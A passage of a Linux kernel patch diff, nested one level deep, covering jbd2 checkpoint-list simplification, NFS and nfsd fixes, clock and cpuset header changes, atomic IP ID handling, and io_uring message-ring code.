++		journal_shrink_one_cp_list(transaction->t_checkpoint_list,
++					   destroy, &released);
+ 		/*
+ 		 * This function only frees up some memory if possible so we
+ 		 * dont have an obligation to finish processing. Bail out if
+@@ -568,23 +505,12 @@ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy)
+ 		 */
+ 		if (need_resched())
+ 			return;
+-		if (ret)
+-			continue;
+-		/*
+-		 * It is essential that we are as careful as in the case of
+-		 * t_checkpoint_list with removing the buffer from the list as
+-		 * we can possibly see not yet submitted buffers on io_list
+-		 */
+-		ret = journal_clean_one_cp_list(transaction->
+-				t_checkpoint_io_list, destroy);
+-		if (need_resched())
+-			return;
+ 		/*
+ 		 * Stop scanning if we couldn't free the transaction. This
+ 		 * avoids pointless scanning of transactions which still
+ 		 * weren't checkpointed.
+ 		 */
+-		if (!ret)
++		if (!released)
+ 			return;
+ 	} while (transaction != last_transaction);
+ }
+@@ -663,7 +589,7 @@ int __jbd2_journal_remove_checkpoint(struct journal_head *jh)
+ 	jbd2_journal_put_journal_head(jh);
+ 
+ 	/* Is this transaction empty? */
+-	if (transaction->t_checkpoint_list || transaction->t_checkpoint_io_list)
++	if (transaction->t_checkpoint_list)
+ 		return 0;
+ 
+ 	/*
+@@ -694,6 +620,34 @@ int __jbd2_journal_remove_checkpoint(struct journal_head *jh)
+ 	return 1;
+ }
+ 
++/*
++ * Check the checkpoint buffer and try to remove it from the checkpoint
++ * list if it's clean. Returns -EBUSY if it is not clean, returns 1 if
++ * it frees the transaction, 0 otherwise.
++ *
++ * This function is called with j_list_lock held.
++ */
++int jbd2_journal_try_remove_checkpoint(struct journal_head *jh)
++{
++	struct buffer_head *bh = jh2bh(jh);
++
++	if (!trylock_buffer(bh))
++		return -EBUSY;
++	if (buffer_dirty(bh)) {
++		unlock_buffer(bh);
++		return -EBUSY;
++	}
++	unlock_buffer(bh);
++
++	/*
++	 * Buffer is clean and the IO has finished (we held the buffer
++	 * lock) so the checkpoint is done. We can safely remove the
++	 * buffer from this transaction.
++	 */
++	JBUFFER_TRACE(jh, "remove from checkpoint list");
++	return __jbd2_journal_remove_checkpoint(jh);
++}
++
+ /*
+  * journal_insert_checkpoint: put a committed buffer onto a checkpoint
+  * list so that we know when it is safe to clean the transaction out of
+@@ -755,7 +709,6 @@ void __jbd2_journal_drop_transaction(journal_t *journal, transaction_t *transact
+ 	J_ASSERT(transaction->t_forget == NULL);
+ 	J_ASSERT(transaction->t_shadow_list == NULL);
+ 	J_ASSERT(transaction->t_checkpoint_list == NULL);
+-	J_ASSERT(transaction->t_checkpoint_io_list == NULL);
+ 	J_ASSERT(atomic_read(&transaction->t_updates) == 0);
+ 	J_ASSERT(journal->j_committing_transaction != transaction);
+ 	J_ASSERT(journal->j_running_transaction != transaction);
+diff --git a/fs/jbd2/commit.c b/fs/jbd2/commit.c
+index 885a7a6cc53e6..f1d9db6686e31 100644
+--- a/fs/jbd2/commit.c
++++ b/fs/jbd2/commit.c
+@@ -1171,8 +1171,7 @@ restart_loop:
+ 	spin_lock(&journal->j_list_lock);
+ 	commit_transaction->t_state = T_FINISHED;
+ 	/* Check if the transaction can be dropped now that we are finished */
+-	if (commit_transaction->t_checkpoint_list == NULL &&
+-	    commit_transaction->t_checkpoint_io_list == NULL) {
++	if (commit_transaction->t_checkpoint_list == NULL) {
+ 		__jbd2_journal_drop_transaction(journal, commit_transaction);
+ 		jbd2_journal_free_transaction(commit_transaction);
+ 	}
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 18611241f4513..6ef5022949c46 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -1784,8 +1784,7 @@ int jbd2_journal_forget(handle_t *handle, struct buffer_head *bh)
+ 		 * Otherwise, if the buffer has been written to disk,
+ 		 * it is safe to remove the checkpoint and drop it.
+ 		 */
+-		if (!buffer_dirty(bh)) {
+-			__jbd2_journal_remove_checkpoint(jh);
++		if (jbd2_journal_try_remove_checkpoint(jh) >= 0) {
+ 			spin_unlock(&journal->j_list_lock);
+ 			goto drop;
+ 		}
+@@ -2112,20 +2111,14 @@ __journal_try_to_free_buffer(journal_t *journal, struct buffer_head *bh)
+ 
+ 	jh = bh2jh(bh);
+ 
+-	if (buffer_locked(bh) || buffer_dirty(bh))
+-		goto out;
+-
+ 	if (jh->b_next_transaction != NULL || jh->b_transaction != NULL)
+-		goto out;
++		return;
+ 
+ 	spin_lock(&journal->j_list_lock);
+-	if (jh->b_cp_transaction != NULL) {
+-		/* written-back checkpointed metadata buffer */
+-		JBUFFER_TRACE(jh, "remove from checkpoint list");
+-		__jbd2_journal_remove_checkpoint(jh);
+-	}
++	/* Remove written-back checkpointed metadata buffer */
++	if (jh->b_cp_transaction != NULL)
++		jbd2_journal_try_remove_checkpoint(jh);
+ 	spin_unlock(&journal->j_list_lock);
+-out:
+ 	return;
+ }
+ 
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 1707f46b1335c..cf34d0c309459 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -474,20 +474,26 @@ out:
+ 	return result;
+ }
+ 
+-static void
+-nfs_direct_join_group(struct list_head *list, struct inode *inode)
++static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
+ {
+-	struct nfs_page *req, *next;
++	struct nfs_page *req, *subreq;
+ 
+ 	list_for_each_entry(req, list, wb_list) {
+-		if (req->wb_head != req || req->wb_this_page == req)
++		if (req->wb_head != req)
+ 			continue;
+-		for (next = req->wb_this_page;
+-				next != req->wb_head;
+-				next = next->wb_this_page) {
+-			nfs_list_remove_request(next);
+-			nfs_release_request(next);
+-		}
++		subreq = req->wb_this_page;
++		if (subreq == req)
++			continue;
++		do {
++			/*
++			 * Remove subrequests from this list before freeing
++			 * them in the call to nfs_join_page_group().
++			 */
++			if (!list_empty(&subreq->wb_list)) {
++				nfs_list_remove_request(subreq);
++				nfs_release_request(subreq);
++			}
++		} while ((subreq = subreq->wb_this_page) != req);
+ 		nfs_join_page_group(req, inode);
+ 	}
+ }
+diff --git a/fs/nfs/inode.c b/fs/nfs/inode.c
+index 6b2cfa59a1a2b..e0c1fb98f907a 100644
+--- a/fs/nfs/inode.c
++++ b/fs/nfs/inode.c
+@@ -717,9 +717,7 @@ void nfs_setattr_update_inode(struct inode *inode, struct iattr *attr,
+ 		if ((attr->ia_valid & ATTR_KILL_SUID) != 0 &&
+ 		    inode->i_mode & S_ISUID)
+ 			inode->i_mode &= ~S_ISUID;
+-		if ((attr->ia_valid & ATTR_KILL_SGID) != 0 &&
+-		    (inode->i_mode & (S_ISGID | S_IXGRP)) ==
+-		     (S_ISGID | S_IXGRP))
++		if (setattr_should_drop_sgid(&init_user_ns, inode))
+ 			inode->i_mode &= ~S_ISGID;
+ 		if ((attr->ia_valid & ATTR_MODE) != 0) {
+ 			int mode = attr->ia_mode & S_IALLUGO;
+diff --git a/fs/nfs/nfs42proc.c b/fs/nfs/nfs42proc.c
+index ecb428512fe1a..7c33bba179d2f 100644
+--- a/fs/nfs/nfs42proc.c
++++ b/fs/nfs/nfs42proc.c
+@@ -1359,7 +1359,6 @@ ssize_t nfs42_proc_getxattr(struct inode *inode, const char *name,
+ 	for (i = 0; i < np; i++) {
+ 		pages[i] = alloc_page(GFP_KERNEL);
+ 		if (!pages[i]) {
+-			np = i + 1;
+ 			err = -ENOMEM;
+ 			goto out;
+ 		}
+@@ -1383,8 +1382,8 @@ ssize_t nfs42_proc_getxattr(struct inode *inode, const char *name,
+ 	} while (exception.retry);
+ 
+ out:
+-	while (--np >= 0)
+-		__free_page(pages[np]);
++	while (--i >= 0)
++		__free_page(pages[i]);
+ 	kfree(pages);
+ 
+ 	return err;
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 177cb7b089b9a..1044305e77996 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -5995,9 +5995,8 @@ static ssize_t __nfs4_get_acl_uncached(struct inode *inode, void *buf,
+ out_ok:
+ 	ret = res.acl_len;
+ out_free:
+-	for (i = 0; i < npages; i++)
+-		if (pages[i])
+-			__free_page(pages[i]);
++	while (--i >= 0)
++		__free_page(pages[i]);
+ 	if (res.acl_scratch)
+ 		__free_page(res.acl_scratch);
+ 	kfree(pages);
+@@ -7171,8 +7170,15 @@ static void nfs4_lock_done(struct rpc_task *task, void *calldata)
+ 		} else if (!nfs4_update_lock_stateid(lsp, &data->res.stateid))
+ 			goto out_restart;
+ 		break;
+-	case -NFS4ERR_BAD_STATEID:
+ 	case -NFS4ERR_OLD_STATEID:
++		if (data->arg.new_lock_owner != 0 &&
++			nfs4_refresh_open_old_stateid(&data->arg.open_stateid,
++					lsp->ls_state))
++			goto out_restart;
++		if (nfs4_refresh_lock_old_stateid(&data->arg.lock_stateid, lsp))
++			goto out_restart;
++		fallthrough;
++	case -NFS4ERR_BAD_STATEID:
+ 	case -NFS4ERR_STALE_STATEID:
+ 	case -NFS4ERR_EXPIRED:
+ 		if (data->arg.new_lock_owner != 0) {
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index c5dc0cd6f7031..96714e105d7bf 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -1368,9 +1368,9 @@ static void revoke_delegation(struct nfs4_delegation *dp)
+ 	WARN_ON(!list_empty(&dp->dl_recall_lru));
+ 
+ 	if (clp->cl_minorversion) {
++		spin_lock(&clp->cl_lock);
+ 		dp->dl_stid.sc_type = NFS4_REVOKED_DELEG_STID;
+ 		refcount_inc(&dp->dl_stid.sc_count);
+-		spin_lock(&clp->cl_lock);
+ 		list_add(&dp->dl_recall_lru, &clp->cl_revoked);
+ 		spin_unlock(&clp->cl_lock);
+ 	}
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 155b34c4683c2..4c11046800ab4 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -321,7 +321,9 @@ nfsd_sanitize_attrs(struct inode *inode, struct iattr *iap)
+ 				iap->ia_mode &= ~S_ISGID;
+ 		} else {
+ 			/* set ATTR_KILL_* bits and let VFS handle it */
+-			iap->ia_valid |= (ATTR_KILL_SUID | ATTR_KILL_SGID);
++			iap->ia_valid |= ATTR_KILL_SUID;
++			iap->ia_valid |=
++				setattr_should_drop_sgid(&init_user_ns, inode);
+ 		}
+ 	}
+ }
+diff --git a/include/drm/display/drm_dp.h b/include/drm/display/drm_dp.h
+index 05f2cc03d03d9..b235d6833e27d 100644
+--- a/include/drm/display/drm_dp.h
++++ b/include/drm/display/drm_dp.h
+@@ -1525,7 +1525,7 @@ enum drm_dp_phy {
+ 
+ #define DP_BRANCH_OUI_HEADER_SIZE	0xc
+ #define DP_RECEIVER_CAP_SIZE		0xf
+-#define DP_DSC_RECEIVER_CAP_SIZE        0xf
++#define DP_DSC_RECEIVER_CAP_SIZE        0x10 /* DSC Capabilities 0x60 through 0x6F */
+ #define EDP_PSR_RECEIVER_CAP_SIZE	2
+ #define EDP_DISPLAY_CTL_CAP_SIZE	3
+ #define DP_LTTPR_COMMON_CAP_SIZE	8
+diff --git a/include/drm/drm_aperture.h b/include/drm/drm_aperture.h
+index 7096703c39493..cbe33b49fd5dc 100644
+--- a/include/drm/drm_aperture.h
++++ b/include/drm/drm_aperture.h
+@@ -13,14 +13,13 @@ int devm_aperture_acquire_from_firmware(struct drm_device *dev, resource_size_t
+ 					resource_size_t size);
+ 
+ int drm_aperture_remove_conflicting_framebuffers(resource_size_t base, resource_size_t size,
+-						 bool primary, const struct drm_driver *req_driver);
++						 const struct drm_driver *req_driver);
+ 
+ int drm_aperture_remove_conflicting_pci_framebuffers(struct pci_dev *pdev,
+ 						     const struct drm_driver *req_driver);
+ 
+ /**
+  * drm_aperture_remove_framebuffers - remove all existing framebuffers
+- * @primary: also kick vga16fb if present
+  * @req_driver: requesting DRM driver
+  *
+  * This function removes all graphics device drivers. Use this function on systems
+@@ -30,9 +29,9 @@ int drm_aperture_remove_conflicting_pci_framebuffers(struct pci_dev *pdev,
+  * 0 on success, or a negative errno code otherwise
+  */
+ static inline int
+-drm_aperture_remove_framebuffers(bool primary, const struct drm_driver *req_driver)
++drm_aperture_remove_framebuffers(const struct drm_driver *req_driver)
+ {
+-	return drm_aperture_remove_conflicting_framebuffers(0, (resource_size_t)-1, primary,
++	return drm_aperture_remove_conflicting_framebuffers(0, (resource_size_t)-1,
+ 							    req_driver);
+ }
+ 
+diff --git a/include/linux/clk.h b/include/linux/clk.h
+index 1ef0133242374..06f1b292f8a00 100644
+--- a/include/linux/clk.h
++++ b/include/linux/clk.h
+@@ -183,6 +183,39 @@ int clk_get_scaled_duty_cycle(struct clk *clk, unsigned int scale);
+  */
+ bool clk_is_match(const struct clk *p, const struct clk *q);
+ 
++/**
++ * clk_rate_exclusive_get - get exclusivity over the rate control of a
++ *                          producer
++ * @clk: clock source
++ *
++ * This function allows drivers to get exclusive control over the rate of a
++ * provider. It prevents any other consumer to execute, even indirectly,
++ * opereation which could alter the rate of the provider or cause glitches
++ *
++ * If exlusivity is claimed more than once on clock, even by the same driver,
++ * the rate effectively gets locked as exclusivity can't be preempted.
++ *
++ * Must not be called from within atomic context.
++ *
++ * Returns success (0) or negative errno.
++ */
++int clk_rate_exclusive_get(struct clk *clk);
++
++/**
++ * clk_rate_exclusive_put - release exclusivity over the rate control of a
++ *                          producer
++ * @clk: clock source
++ *
++ * This function allows drivers to release the exclusivity it previously got
++ * from clk_rate_exclusive_get()
++ *
++ * The caller must balance the number of clk_rate_exclusive_get() and
++ * clk_rate_exclusive_put() calls.
++ *
++ * Must not be called from within atomic context.
++ */
++void clk_rate_exclusive_put(struct clk *clk);
++
+ #else
+ 
+ static inline int clk_notifier_register(struct clk *clk,
+@@ -236,6 +269,13 @@ static inline bool clk_is_match(const struct clk *p, const struct clk *q)
+ 	return p == q;
+ }
+ 
++static inline int clk_rate_exclusive_get(struct clk *clk)
++{
++	return 0;
++}
++
++static inline void clk_rate_exclusive_put(struct clk *clk) {}
++
+ #endif
+ 
+ #ifdef CONFIG_HAVE_CLK_PREPARE
+@@ -583,38 +623,6 @@ struct clk *devm_clk_get_optional_enabled(struct device *dev, const char *id);
+  */
+ struct clk *devm_get_clk_from_child(struct device *dev,
+ 				    struct device_node *np, const char *con_id);
+-/**
+- * clk_rate_exclusive_get - get exclusivity over the rate control of a
+- *                          producer
+- * @clk: clock source
+- *
+- * This function allows drivers to get exclusive control over the rate of a
+- * provider. It prevents any other consumer to execute, even indirectly,
+- * opereation which could alter the rate of the provider or cause glitches
+- *
+- * If exlusivity is claimed more than once on clock, even by the same driver,
+- * the rate effectively gets locked as exclusivity can't be preempted.
+- *
+- * Must not be called from within atomic context.
+- *
+- * Returns success (0) or negative errno.
+- */
+-int clk_rate_exclusive_get(struct clk *clk);
+-
+-/**
+- * clk_rate_exclusive_put - release exclusivity over the rate control of a
+- *                          producer
+- * @clk: clock source
+- *
+- * This function allows drivers to release the exclusivity it previously got
+- * from clk_rate_exclusive_get()
+- *
+- * The caller must balance the number of clk_rate_exclusive_get() and
+- * clk_rate_exclusive_put() calls.
+- *
+- * Must not be called from within atomic context.
+- */
+-void clk_rate_exclusive_put(struct clk *clk);
+ 
+ /**
+  * clk_enable - inform the system when the clock source should be running.
+@@ -974,14 +982,6 @@ static inline void clk_bulk_put_all(int num_clks, struct clk_bulk_data *clks) {}
+ 
+ static inline void devm_clk_put(struct device *dev, struct clk *clk) {}
+ 
+-
+-static inline int clk_rate_exclusive_get(struct clk *clk)
+-{
+-	return 0;
+-}
+-
+-static inline void clk_rate_exclusive_put(struct clk *clk) {}
+-
+ static inline int clk_enable(struct clk *clk)
+ {
+ 	return 0;
+diff --git a/include/linux/cpuset.h b/include/linux/cpuset.h
+index d58e0476ee8e3..0348dba5680ef 100644
+--- a/include/linux/cpuset.h
++++ b/include/linux/cpuset.h
+@@ -71,8 +71,10 @@ extern void cpuset_init_smp(void);
+ extern void cpuset_force_rebuild(void);
+ extern void cpuset_update_active_cpus(void);
+ extern void cpuset_wait_for_hotplug(void);
+-extern void cpuset_read_lock(void);
+-extern void cpuset_read_unlock(void);
++extern void inc_dl_tasks_cs(struct task_struct *task);
++extern void dec_dl_tasks_cs(struct task_struct *task);
++extern void cpuset_lock(void);
++extern void cpuset_unlock(void);
+ extern void cpuset_cpus_allowed(struct task_struct *p, struct cpumask *mask);
+ extern bool cpuset_cpus_allowed_fallback(struct task_struct *p);
+ extern nodemask_t cpuset_mems_allowed(struct task_struct *p);
+@@ -196,8 +198,10 @@ static inline void cpuset_update_active_cpus(void)
+ 
+ static inline void cpuset_wait_for_hotplug(void) { }
+ 
+-static inline void cpuset_read_lock(void) { }
+-static inline void cpuset_read_unlock(void) { }
++static inline void inc_dl_tasks_cs(struct task_struct *task) { }
++static inline void dec_dl_tasks_cs(struct task_struct *task) { }
++static inline void cpuset_lock(void) { }
++static inline void cpuset_unlock(void) { }
+ 
+ static inline void cpuset_cpus_allowed(struct task_struct *p,
+ 				       struct cpumask *mask)
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index a2b5592c68284..26ea1a0a59a10 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -3120,6 +3120,8 @@ extern struct inode *new_inode(struct super_block *sb);
+ extern void free_inode_nonrcu(struct inode *inode);
+ extern int setattr_should_drop_suidgid(struct user_namespace *, struct inode *);
+ extern int file_remove_privs(struct file *);
++int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
++			     const struct inode *inode);
+ 
+ /*
+  * This must be used for allocating filesystems specific inodes to set
+diff --git a/include/linux/jbd2.h b/include/linux/jbd2.h
+index 0b7242370b567..ebb1608d9dcd2 100644
+--- a/include/linux/jbd2.h
++++ b/include/linux/jbd2.h
+@@ -622,12 +622,6 @@ struct transaction_s
+ 	 */
+ 	struct journal_head	*t_checkpoint_list;
+ 
+-	/*
+-	 * Doubly-linked circular list of all buffers submitted for IO while
+-	 * checkpointing. [j_list_lock]
+-	 */
+-	struct journal_head	*t_checkpoint_io_list;
+-
+ 	/*
+ 	 * Doubly-linked circular list of metadata buffers being
+ 	 * shadowed by log IO.  The IO buffers on the iobuf list and
+@@ -1441,6 +1435,7 @@ extern void jbd2_journal_commit_transaction(journal_t *);
+ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy);
+ unsigned long jbd2_journal_shrink_checkpoint_list(journal_t *journal, unsigned long *nr_to_scan);
+ int __jbd2_journal_remove_checkpoint(struct journal_head *);
++int jbd2_journal_try_remove_checkpoint(struct journal_head *jh);
+ void jbd2_journal_destroy_checkpoint(journal_t *journal);
+ void __jbd2_journal_insert_checkpoint(struct journal_head *, transaction_t *);
+ 
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index b8ed44f401b58..104ec00823da8 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -1727,6 +1727,25 @@ static inline size_t folio_size(struct folio *folio)
+ 	return PAGE_SIZE << folio_order(folio);
+ }
+ 
++/**
++ * folio_estimated_sharers - Estimate the number of sharers of a folio.
++ * @folio: The folio.
++ *
++ * folio_estimated_sharers() aims to serve as a function to efficiently
++ * estimate the number of processes sharing a folio. This is done by
++ * looking at the precise mapcount of the first subpage in the folio, and
++ * assuming the other subpages are the same. This may not be true for large
++ * folios. If you want exact mapcounts for exact calculations, look at
++ * page_mapcount() or folio_total_mapcount().
++ *
++ * Return: The estimated number of processes sharing a folio.
++ */
++static inline int folio_estimated_sharers(struct folio *folio)
++{
++	return page_mapcount(folio_page(folio, 0));
++}
++
++
+ #ifndef HAVE_ARCH_MAKE_PAGE_ACCESSIBLE
+ static inline int arch_make_page_accessible(struct page *page)
+ {
+@@ -3091,6 +3110,16 @@ static inline bool gup_must_unshare(unsigned int flags, struct page *page)
+ 	if (IS_ENABLED(CONFIG_HAVE_FAST_GUP))
+ 		smp_rmb();
+ 
++	/*
++	 * During GUP-fast we might not get called on the head page for a
++	 * hugetlb page that is mapped using cont-PTE, because GUP-fast does
++	 * not work with the abstracted hugetlb PTEs that always point at the
++	 * head page. For hugetlb, PageAnonExclusive only applies on the head
++	 * page (as it cannot be partially COW-shared), so lookup the head page.
++	 */
++	if (unlikely(!PageHead(page) && PageHuge(page)))
++		page = compound_head(page);
++
+ 	/*
+ 	 * Note that PageKsm() pages cannot be exclusive, and consequently,
+ 	 * cannot get pinned.
+diff --git a/include/linux/raid_class.h b/include/linux/raid_class.h
+index 5cdfcb873a8f0..772d45b2a60a0 100644
+--- a/include/linux/raid_class.h
++++ b/include/linux/raid_class.h
+@@ -77,7 +77,3 @@ DEFINE_RAID_ATTRIBUTE(enum raid_state, state)
+ 	
+ struct raid_template *raid_class_attach(struct raid_function_template *);
+ void raid_class_release(struct raid_template *);
+-
+-int __must_check raid_component_add(struct raid_template *, struct device *,
+-				    struct device *);
+-
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index ffb6eb55cd135..0cac69902ec58 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -1846,7 +1846,9 @@ current_restore_flags(unsigned long orig_flags, unsigned long flags)
+ }
+ 
+ extern int cpuset_cpumask_can_shrink(const struct cpumask *cur, const struct cpumask *trial);
+-extern int task_can_attach(struct task_struct *p, const struct cpumask *cs_effective_cpus);
++extern int task_can_attach(struct task_struct *p);
++extern int dl_bw_alloc(int cpu, u64 dl_bw);
++extern void dl_bw_free(int cpu, u64 dl_bw);
+ #ifdef CONFIG_SMP
+ extern void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask);
+ extern int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask);
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index 17329a19f0c64..9a3ac960dfe15 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -727,23 +727,14 @@ static inline struct slave *bond_slave_has_mac(struct bonding *bond,
+ }
+ 
+ /* Caller must hold rcu_read_lock() for read */
+-static inline bool bond_slave_has_mac_rx(struct bonding *bond, const u8 *mac)
++static inline bool bond_slave_has_mac_rcu(struct bonding *bond, const u8 *mac)
+ {
+ 	struct list_head *iter;
+ 	struct slave *tmp;
+-	struct netdev_hw_addr *ha;
+ 
+ 	bond_for_each_slave_rcu(bond, tmp, iter)
+ 		if (ether_addr_equal_64bits(mac, tmp->dev->dev_addr))
+ 			return true;
+-
+-	if (netdev_uc_empty(bond->dev))
+-		return false;
+-
+-	netdev_for_each_uc_addr(ha, bond->dev)
+-		if (ether_addr_equal_64bits(mac, ha->addr))
+-			return true;
+-
+ 	return false;
+ }
+ 
+diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h
+index c8ef3b881f03d..c2432c2addc82 100644
+--- a/include/net/inet_sock.h
++++ b/include/net/inet_sock.h
+@@ -222,8 +222,8 @@ struct inet_sock {
+ 	__s16			uc_ttl;
+ 	__u16			cmsg_flags;
+ 	struct ip_options_rcu __rcu	*inet_opt;
++	atomic_t		inet_id;
+ 	__be16			inet_sport;
+-	__u16			inet_id;
+ 
+ 	__u8			tos;
+ 	__u8			min_ttl;
+diff --git a/include/net/ip.h b/include/net/ip.h
+index 530e7257e4389..1872f570abeda 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -532,8 +532,19 @@ static inline void ip_select_ident_segs(struct net *net, struct sk_buff *skb,
+ 	 * generator as much as we can.
+ 	 */
+ 	if (sk && inet_sk(sk)->inet_daddr) {
+-		iph->id = htons(inet_sk(sk)->inet_id);
+-		inet_sk(sk)->inet_id += segs;
++		int val;
++
++		/* avoid atomic operations for TCP,
++		 * as we hold socket lock at this point.
++		 */
++		if (sk_is_tcp(sk)) {
++			sock_owned_by_me(sk);
++			val = atomic_read(&inet_sk(sk)->inet_id);
++			atomic_set(&inet_sk(sk)->inet_id, val + segs);
++		} else {
++			val = atomic_add_return(segs, &inet_sk(sk)->inet_id);
++		}
++		iph->id = htons(val);
+ 		return;
+ 	}
+ 	if ((iph->frag_off & htons(IP_DF)) && !skb->ignore_df) {
+diff --git a/include/net/mac80211.h b/include/net/mac80211.h
+index 72b739dc6d530..8a338c33118f9 100644
+--- a/include/net/mac80211.h
++++ b/include/net/mac80211.h
+@@ -6444,6 +6444,7 @@ void ieee80211_stop_rx_ba_session(struct ieee80211_vif *vif, u16 ba_rx_bitmap,
+  * marks frames marked in the bitmap as having been filtered. Afterwards, it
+  * checks if any frames in the window starting from @ssn can now be released
+  * (in case they were only waiting for frames that were filtered.)
++ * (Only work correctly if @max_rx_aggregation_subframes <= 64 frames)
+  */
+ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 					  u16 ssn, u64 filtered,
+diff --git a/include/net/rtnetlink.h b/include/net/rtnetlink.h
+index bf8bb33578250..9f881b74f32ed 100644
+--- a/include/net/rtnetlink.h
++++ b/include/net/rtnetlink.h
+@@ -189,8 +189,8 @@ struct net_device *rtnl_create_link(struct net *net, const char *ifname,
+ int rtnl_delete_link(struct net_device *dev);
+ int rtnl_configure_link(struct net_device *dev, const struct ifinfomsg *ifm);
+ 
+-int rtnl_nla_parse_ifla(struct nlattr **tb, const struct nlattr *head, int len,
+-			struct netlink_ext_ack *exterr);
++int rtnl_nla_parse_ifinfomsg(struct nlattr **tb, const struct nlattr *nla_peer,
++			     struct netlink_ext_ack *exterr);
+ struct net *rtnl_get_net_ns_capable(struct sock *sk, int netnsid);
+ 
+ #define MODULE_ALIAS_RTNL_LINK(kind) MODULE_ALIAS("rtnl-link-" kind)
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 699408944952c..d1f936ed97556 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1320,6 +1320,7 @@ struct proto {
+ 	/*
+ 	 * Pressure flag: try to collapse.
+ 	 * Technical note: it is used by multiple contexts non atomically.
++	 * Make sure to use READ_ONCE()/WRITE_ONCE() for all reads/writes.
+ 	 * All the __sk_mem_schedule() is of this nature: accounting
+ 	 * is strict, actions are advisory and have some latency.
+ 	 */
+@@ -1448,7 +1449,7 @@ static inline bool sk_has_memory_pressure(const struct sock *sk)
+ static inline bool sk_under_global_memory_pressure(const struct sock *sk)
+ {
+ 	return sk->sk_prot->memory_pressure &&
+-		!!*sk->sk_prot->memory_pressure;
++		!!READ_ONCE(*sk->sk_prot->memory_pressure);
+ }
+ 
+ static inline bool sk_under_memory_pressure(const struct sock *sk)
+@@ -1460,7 +1461,7 @@ static inline bool sk_under_memory_pressure(const struct sock *sk)
+ 	    mem_cgroup_under_socket_pressure(sk->sk_memcg))
+ 		return true;
+ 
+-	return !!*sk->sk_prot->memory_pressure;
++	return !!READ_ONCE(*sk->sk_prot->memory_pressure);
+ }
+ 
+ static inline long
+@@ -1537,7 +1538,7 @@ proto_memory_pressure(struct proto *prot)
+ {
+ 	if (!prot->memory_pressure)
+ 		return false;
+-	return !!*prot->memory_pressure;
++	return !!READ_ONCE(*prot->memory_pressure);
+ }
+ 
+ 
+diff --git a/include/trace/events/jbd2.h b/include/trace/events/jbd2.h
+index 8f5ee380d3093..5646ae15a957a 100644
+--- a/include/trace/events/jbd2.h
++++ b/include/trace/events/jbd2.h
+@@ -462,11 +462,9 @@ TRACE_EVENT(jbd2_shrink_scan_exit,
+ TRACE_EVENT(jbd2_shrink_checkpoint_list,
+ 
+ 	TP_PROTO(journal_t *journal, tid_t first_tid, tid_t tid, tid_t last_tid,
+-		 unsigned long nr_freed, unsigned long nr_scanned,
+-		 tid_t next_tid),
++		 unsigned long nr_freed, tid_t next_tid),
+ 
+-	TP_ARGS(journal, first_tid, tid, last_tid, nr_freed,
+-		nr_scanned, next_tid),
++	TP_ARGS(journal, first_tid, tid, last_tid, nr_freed, next_tid),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(dev_t, dev)
+@@ -474,7 +472,6 @@ TRACE_EVENT(jbd2_shrink_checkpoint_list,
+ 		__field(tid_t, tid)
+ 		__field(tid_t, last_tid)
+ 		__field(unsigned long, nr_freed)
+-		__field(unsigned long, nr_scanned)
+ 		__field(tid_t, next_tid)
+ 	),
+ 
+@@ -484,15 +481,14 @@ TRACE_EVENT(jbd2_shrink_checkpoint_list,
+ 		__entry->tid		= tid;
+ 		__entry->last_tid	= last_tid;
+ 		__entry->nr_freed	= nr_freed;
+-		__entry->nr_scanned	= nr_scanned;
+ 		__entry->next_tid	= next_tid;
+ 	),
+ 
+ 	TP_printk("dev %d,%d shrink transaction %u-%u(%u) freed %lu "
+-		  "scanned %lu next transaction %u",
++		  "next transaction %u",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev),
+ 		  __entry->first_tid, __entry->tid, __entry->last_tid,
+-		  __entry->nr_freed, __entry->nr_scanned, __entry->next_tid)
++		  __entry->nr_freed, __entry->next_tid)
+ );
+ 
+ #endif /* _TRACE_JBD2_H */
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index 3526389ac2180..cd922d2bef5f5 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -15,6 +15,7 @@
+ 
+ struct io_msg {
+ 	struct file			*file;
++	struct file			*src_file;
+ 	u64 user_data;
+ 	u32 len;
+ 	u32 cmd;
+@@ -23,33 +24,12 @@ struct io_msg {
+ 	u32 flags;
+ };
+ 
+-static int io_msg_ring_data(struct io_kiocb *req)
++static void io_double_unlock_ctx(struct io_ring_ctx *octx)
+ {
+-	struct io_ring_ctx *target_ctx = req->file->private_data;
+-	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
+-
+-	if (msg->src_fd || msg->dst_fd || msg->flags)
